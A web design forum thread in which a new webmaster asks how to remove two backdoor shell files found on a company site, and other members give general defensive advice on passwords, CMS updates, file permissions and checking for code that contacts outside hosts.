Register

If this is your first visit, please click the Sign Up now button to begin the process of creating your account so you can begin posting on our forums! The Sign Up process will only take up about a minute of two of your time.

Results 1 to 5 of 5
  1. #1
    Junior Member
    Join Date
    May 2013
    Posts
    13
    Member #
    36339
    I recently took over as webmaster for a company. I have to update some files, so I downloaded all the site files from the server and virus scanned them - have 2 backdoor.shell viruses that are recognized by AVG.

    How do I go about removing them and securing the site? The site still reads: "https://" as secured live, but we have had some customers who have experienced identity theft and are trying to ensure that it is not from our site.

    Any and all advice is greatly appreciated!

  2.  

  3. #2
    Senior Member Webzarus's Avatar
    Join Date
    May 2011
    Location
    South Carolina Coast
    Posts
    3,322
    Member #
    27709
    Liked
    770 times
    That's actually a question you should be asking your hosting provider.

    Unless of course you own and manage your own servers ( I suspect you don't ), and decent hosting provider is going to be running active scanning of all files before they are allowed to be written to their servers.

    The more important question is how did they get their ? Are you running any kind of advertising ? Do you allow "customer uploads", do your have file and folder permissions set on the server correctly.

    Did "all" the previous web companies passwords get removed and of changed ? Do you have any files that don't seem to go along with the actual site ?

    There are literally hundreds of ways this can happen, but the above list should be looked ad and addressed.

    Just because a file exist on a site, doesn't mean the site itself is distributing, but more often, its just a storage place "because of lax security", and other sites call the files ...

    Then again, there could be some includes in your code... Sending it out to all visitors...

    If there's any concern at all that your site is distributing malware or viruses ... The site should be shut down... All files examined and all file and folder permissions checked... Before bringing it back online.

  4. #3
    Junior Member
    Join Date
    May 2013
    Posts
    13
    Member #
    36339
    Thanks for all your help Webzarus, it is greatly appreciated. Not sure how the files got there, I'm corresponding with tech support from the hosting company right now.

    No customer uploading whatsoever, file and folder permissions are set accordingly.

    So I'm guessing this isn't as easy as locating the files and just pressing delete?

  5. #4
    Unpaid WDF Intern TheGAME1264's Avatar
    Join Date
    Dec 2002
    Location
    Not from USA
    Posts
    14,483
    Member #
    425
    Liked
    2783 times
    No, although it's not necessarily a hosting issue either. If the site is running one of the garbage so-called "CMSes", such as W*rdPr*ss, then it may very well have been exploited. I've seen this happen multiple times over the past few years, moreso than with the hosting provider themselves (although they're just as likely to be culpable.)

    The best thing you can do in this case is to get the exact names of the viruses and try to Google it and see what others may be saying about it. That'll at least narrow down to some extent the steps you have to take.

    Another option, although this is a hit and miss, is to sign up for Google Webmaster Tools and see if they have any malware/virus reports for your site. If there's anything causing harm, they quite often know about it.

    Some of the things you'll need to do in general:

    1) Change any and all passwords. Ideally, you want to change them to some combination of mixed-case letters, numbers, and symbols.

    2) If there's any common usernames for admins such as "admin" or "administrator", kill those logins or replace them with something more obscure...like say your name.

    3) If you're running any CMSes, make sure they and any plugins are up to date, and look toward getting rid of them...especially if the virus originated from the CMS you're using.

    4) Like WZ said, have a look at your permissions. Don't just take your host's word for it, either...actually go through all the folders/subfolders and make sure there is nothing beyond read permissions for anything that doesn't need it.
    If I've helped you out in any way, please pay it forward. My wife and I are walking for Autism Speaks. Please donate, and thanks.

    If someone helped you out, be sure to "Like" their post and/or help them in kind. The "Like" link is on the bottom right of each post, beside the "Share" link.

    My stuff (well, some of it): My bowling alley site | Canadian Postal Code Info (beta)

  6. #5
    Banned
    Join Date
    Apr 2014
    Posts
    13
    Member #
    38859
    I'm not sure whether AVG has something that can scan servers, but if it does awesome. See if it can delete them. If it is a CMS, download a plugin like Wordfence.


    Otherwise, I'd just go through your code and try to identify anything that looks suspicious. Backdoors try to "phone home" so look for something that is trying to contact an outside ip/domain or ftp data to another server. You may also want to look at other computers on your network to make sure it the attack didn't originate from them either. Even secure your WIfi, because an actual intrusion and not just some bot may have infected your whole network.


    Get your company to invest in a good firewall like a cisco ASA. They're decently priced and operating one is something you can put on a resume.


    Like Game said, go through and restrict permissions too.


Remove Ads

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •  

Search tags for this page

all backdoor shell

,

set backdoor on server pingback bot

,

shell php backdoor

,

web design backdoor

Click on a term to search for related topics.
All times are GMT -6. The time now is 09:57 AM.
Powered by vBulletin® Version 4.2.3
Copyright © 2019 vBulletin Solutions, Inc. All rights reserved.
vBulletin Skin By: PurevB.com